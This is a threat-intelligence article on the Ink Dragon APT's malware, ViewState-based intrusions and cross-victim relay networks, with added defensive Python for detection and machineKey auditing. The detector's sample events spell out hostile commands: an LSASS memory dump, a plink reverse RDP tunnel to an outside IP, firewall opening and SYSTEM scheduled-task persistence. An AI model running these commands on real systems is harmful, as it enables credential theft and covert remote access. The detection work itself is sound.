Threat Intelligence | December 17, 2025 | 4 min read

China-Linked Ink Dragon APT Targets European Governments with ShadowPad

Sophisticated threat group escalates operations against European government entities using relay networks that route attacks through multiple victim organizations.

Alex Kowalski

A sophisticated China-nexus threat actor known as Ink Dragon has escalated operations targeting European government institutions since July 2025, according to new research from Check Point. The group's campaigns demonstrate advanced tradecraft and a concerning ability to create interconnected attack infrastructure spanning multiple victim organizations.

An Established Threat With Many Names

The threat group operates under multiple tracking designations across the security industry: Ink Dragon, Jewelbug, CL-STA-0049, Earth Alux, and REF7707. Active since at least March 2023, the group has impacted several dozen victims including government entities and telecommunications organizations across Europe, Asia, and Africa.

Check Point researchers note the actors demonstrate "solid software engineering, disciplined operational playbooks" and excel at blending into enterprise environments by leveraging legitimate tools alongside custom malware.

Sophisticated Malware Arsenal

The group deploys a diverse toolkit of custom and shared malware, with two primary backdoors forming the backbone of their operations:

FINALDRAFT (Squidoor)

This cross-platform backdoor runs on both Windows and Linux. The enhanced variant observed in recent campaigns adds stealth and data-exfiltration features. Notably, it uses Outlook mailboxes, accessed through the Microsoft Graph API, as its command-and-control channel, so beacon traffic looks like ordinary Microsoft 365 (Office 365) activity to network defenders.

The modular framework uses encoded command documents to direct infected systems, providing flexibility for operators to deploy additional capabilities as needed.

ShadowPad

A well-known modular backdoor long associated with Chinese state-linked operations, ShadowPad is deployed here through a custom IIS listener module that turns compromised web servers into command-and-control nodes. Traffic can then be proxied through and across multiple victim networks, which significantly complicates attribution and response.

Supporting Tools

The group's toolkit also includes:

  • NANOREMOTE: Uses Google Drive API for file operations and exfiltration
  • Cobalt Strike: the commercial adversary-emulation framework, widely repurposed for real intrusions
  • VARGEIT: Additional backdoor capability
  • LalsDumper and 032Loader: Tools for credential theft and payload execution

Attack Methodology

Ink Dragon gains initial access by exploiting vulnerable internet-exposed web applications. Observed techniques include ASP.NET ViewState deserialization attacks that rely on known or reused machineKey values (with the key, an attacker can produce a correctly signed ViewState payload that the server deserializes and executes), as well as exploitation of SharePoint vulnerabilities.

Once inside target networks, operators deploy web shells to deliver additional payloads and establish persistence through scheduled tasks and Windows services. Host firewall rules are modified to permit command-and-control communications.

Lateral movement relies heavily on RDP tunneling using credentials extracted from compromised systems. The group conducts extensive credential harvesting through LSASS memory dumps and registry hive extraction, enabling domain-wide access in targeted organizations.

Building Relay Networks

Perhaps the most concerning aspect of Ink Dragon operations is their construction of relay networks that span multiple victim organizations. Check Point researchers explain that compromised hosts are converted into infrastructure nodes, enabling attackers to "route traffic not only deeper inside a single organization's network, but also across different victim networks entirely."

This approach provides several advantages: it obscures the true origin of attacks, provides redundancy if individual nodes are discovered, and allows operators to maintain access even if one victim organization detects and remediates the intrusion.

Notable Campaign Details

Researchers documented a particularly sophisticated intrusion targeting a Russian IT service provider that lasted five months. During this operation, attackers demonstrated patience and tradecraft by:

  • Reusing authentication tokens from idle Domain Administrator RDP sessions
  • Exfiltrating the NTDS.dit database together with the SYSTEM registry hive, which yields every domain account's password hash offline for cracking or pass-the-hash reuse
  • Establishing persistence mechanisms that survived system reboots and security tool updates

The investigation also revealed concurrent activity with another China-linked group tracked as REF3927 (RudePanda) on shared victims, suggesting possible coordination or resource sharing between different Chinese intelligence units.

Implications for European Security

The escalation of Ink Dragon operations against European government targets represents a significant intelligence collection effort. While the specific objectives remain unclear, government entities typically possess sensitive information about policy decisions, diplomatic communications, and strategic planning that would be valuable to foreign intelligence services.

Defensive Recommendations

Organizations potentially targeted by sophisticated nation-state actors should consider:

Detection Focus Areas:

  • Monitor for unusual Outlook and Graph API activity patterns
  • Alert on web shell deployment and ASP.NET deserialization attacks
  • Track anomalous RDP connection patterns, especially involving administrative accounts
  • Monitor for LSASS access and credential dumping indicators
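The detection focus areas above, and the post-exploitation chain described under Attack Methodology (web-shell child processes, host firewall changes, scheduled-task persistence, LSASS credential access and RDP port-forwarding), as a small added example. This is not Check Point's code and not a production rule set; it runs over a handful of constructed, Sysmon-style events embedded inline (the field names mirror Sysmon Event ID 1, 3 and 10 records; the values are made up). Cloud-side Outlook and Graph API monitoring is out of scope here because it lives in Microsoft 365 audit logs, not host telemetry.

```python
"""Toy host-based detections for the Ink Dragon post-exploitation behaviours.

Added example, not from the original article or any vendor. All events below
are constructed samples (Sysmon-like field names, invented values).
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample telemetry: EventID 1 = process create, 10 = process access.
EVENTS: List[Event] = [
    {"EventID": "1", "Image": r"C:\Windows\System32\netsh.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": 'netsh advfirewall firewall add rule name="svc" dir=in action=allow protocol=TCP localport=8443'},
    {"EventID": "1", "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /create /tn "Updater" /tr C:\ProgramData\u.exe /sc onlogon /ru SYSTEM'},
    {"EventID": "1", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"EventID": "10", "SourceImage": r"C:\Temp\x.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": "10", "SourceImage": r"C:\Windows\System32\svchost.exe",   # benign: query-only access
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": "1", "Image": r"C:\Users\Public\plink.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "plink.exe -N -R 3389:127.0.0.1:3389 -P 443 user@203.0.113.7"},
    {"EventID": "1", "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Temp\l.dmp full"},
]

WEB_SERVER_PROCS = ("w3wp.exe",)  # IIS worker process: web-shell commands are spawned from it
LOLBINS = ("cmd.exe", "powershell.exe", "netsh.exe", "schtasks.exe", "certutil.exe", "rundll32.exe")
PROCESS_VM_READ = 0x0010           # access right required to read LSASS memory


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def _cmd(e: Event) -> str:
    return e.get("CommandLine", "")


# (rule name, predicate over one event). Each rule maps to a behaviour in the article.
RULES: List[Tuple[str, Callable[[Event], object]]] = [
    ("web_shell_child_process",
     lambda e: e["EventID"] == "1"
     and _base(e.get("ParentImage", "")) in WEB_SERVER_PROCS
     and _base(e.get("Image", "")) in LOLBINS),
    ("host_firewall_rule_added",
     lambda e: e["EventID"] == "1"
     and re.search(r"netsh\s+advfirewall\s+firewall\s+add\s+rule", _cmd(e), re.I)),
    ("scheduled_task_created",
     lambda e: e["EventID"] == "1"
     and re.search(r"schtasks(\.exe)?\s+/create", _cmd(e), re.I)),
    ("lsass_memory_read",
     lambda e: e["EventID"] == "10"
     and _base(e.get("TargetImage", "")) == "lsass.exe"
     and int(e.get("GrantedAccess", "0x0"), 16) & PROCESS_VM_READ),
    ("lsass_minidump_via_comsvcs",
     lambda e: e["EventID"] == "1"
     and re.search(r"comsvcs\.dll.*MiniDump", _cmd(e), re.I)),
    ("rdp_port_forward",   # reverse tunnel exposing 3389 via plink/ssh
     lambda e: e["EventID"] == "1"
     and re.search(r"\b(plink|ssh)(\.exe)?\b.*\s-R\s+\S*3389", _cmd(e), re.I)),
]


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires on every event."""
    hits: List[Tuple[int, str]] = []
    for i, e in enumerate(events):
        for name, pred in RULES:
            if pred(e):
                hits.append((i, name))
    return hits


if __name__ == "__main__":
    for idx, rule in detect(EVENTS):
        print(f"event {idx}: {rule}")
```

The LSASS rule keys on the access mask rather than on a tool name, because credential dumpers vary but all must read process memory; the benign svchost event with a query-only mask is correctly ignored. In a real deployment, the web-shell rule is the highest-signal one here: a shell or LOLBin spawned by w3wp.exe is rarely legitimate.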

Hardening Measures:

  • Implement network segmentation to limit lateral movement
  • Deploy application allowlisting on critical systems
  • Ensure ASP.NET machine keys are unique per application, never copied from documentation or public samples, and rotate any key that may have been exposed
  • Restrict and monitor administrative account usage
  • Implement robust logging with off-network storage
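The machineKey hardening item above, and the ViewState deserialization technique described under Attack Methodology, as an added audit example. This is not the article's or Microsoft's code; it parses a set of constructed web.config fragments embedded inline and flags the three conditions the attack turns on: a static key instead of AutoGenerate (anyone holding the key can forge signed ViewState), the same key pair reused across applications (one leak compromises all of them), and a key that appears on a known-public list (the list here is a constructed placeholder). The 128/64 hex-character length thresholds are assumed, matching what IIS Manager's key generator produces for HMACSHA256 and AES.

```python
"""Audit ASP.NET web.config files for weak or reused <machineKey> settings.

Added example, not from the original article. SAMPLE_CONFIGS and
KNOWN_PUBLIC_KEYS are constructed placeholders.
"""
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed keys: a proper-length pair (copied between site-a and site-b) and a short one.
KEY_V = "A1B2C3D4" * 16   # 128 hex chars
KEY_D = "0F1E2D3C" * 8    # 64 hex chars
WEAK_V = "DEADBEEF" * 4   # 32 hex chars, also on the placeholder "public" list
WEAK_D = "DEADBEEF" * 2

# Placeholder: in practice populate from a real disclosed-key list.
KNOWN_PUBLIC_KEYS = {WEAK_V}

# Assumed thresholds (hex chars): what IIS Manager generates for HMACSHA256 / AES.
MIN_HEX = {"validationKey": 128, "decryptionKey": 64}


def _config(mk: str) -> str:
    return f"<configuration><system.web>{mk}</system.web></configuration>"


# Constructed sample sites.
SAMPLE_CONFIGS: Dict[str, str] = {
    "site-a/web.config": _config(
        f'<machineKey validationKey="{KEY_V}" decryptionKey="{KEY_D}" validation="HMACSHA256" decryption="AES" />'),
    "site-b/web.config": _config(
        f'<machineKey validationKey="{KEY_V}" decryptionKey="{KEY_D}" validation="HMACSHA256" decryption="AES" />'),
    "site-c/web.config": _config(
        '<machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps" />'),
    "site-d/web.config": _config(
        f'<machineKey validationKey="{WEAK_V}" decryptionKey="{WEAK_D}" validation="SHA1" decryption="3DES" />'),
    "site-e/web.config": _config(""),   # no machineKey element at all
}


def parse_machine_key(xml_text: str) -> Optional[Dict[str, str]]:
    """Return the <machineKey> attributes, or None if the config has no such element."""
    root = ET.fromstring(xml_text)
    mk = root.find("./system.web/machineKey")
    return None if mk is None else dict(mk.attrib)


def audit(configs: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each site path to a list of findings; sites with no findings are omitted."""
    findings: Dict[str, List[str]] = defaultdict(list)
    by_key: Dict[tuple, List[str]] = defaultdict(list)

    for site, text in configs.items():
        mk = parse_machine_key(text)
        if mk is None:
            findings[site].append("no explicit machineKey: inherits machine.config, confirm it is AutoGenerate")
            continue
        vk = mk.get("validationKey", "AutoGenerate")
        dk = mk.get("decryptionKey", "AutoGenerate")
        if vk.startswith("AutoGenerate") and dk.startswith("AutoGenerate"):
            continue   # runtime-generated per app: nothing for an attacker to know or reuse
        findings[site].append("static machineKey: anyone holding the key can forge signed ViewState")
        for name, val in (("validationKey", vk), ("decryptionKey", dk)):
            if not re.fullmatch(r"[0-9A-Fa-f]+", val) or len(val) < MIN_HEX[name]:
                findings[site].append(f"{name} is not a {MIN_HEX[name]}-hex-char key")
            if val.upper() in KNOWN_PUBLIC_KEYS:
                findings[site].append(f"{name} matches a publicly known key: rotate immediately")
        by_key[(vk.upper(), dk.upper())].append(site)

    # Cross-application reuse: the same static pair in more than one site.
    for sites in by_key.values():
        if len(sites) > 1:
            for s in sites:
                findings[s].append(f"machineKey reused across {len(sites)} apps: {', '.join(sorted(sites))}")
    return dict(findings)


if __name__ == "__main__":
    for site, issues in audit(SAMPLE_CONFIGS).items():
        for issue in issues:
            print(f"{site}: {issue}")
```

Run it against the real IIS site roots (and machine.config) on each web server; any static key that is shared, short, or publicly known should be regenerated, and ViewState signed with the old key treated as untrusted from that point on.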

The sophistication and persistence demonstrated by Ink Dragon underscore the asymmetric challenge faced by defenders: while attackers only need to succeed once, defenders must maintain vigilance continuously across an ever-expanding attack surface.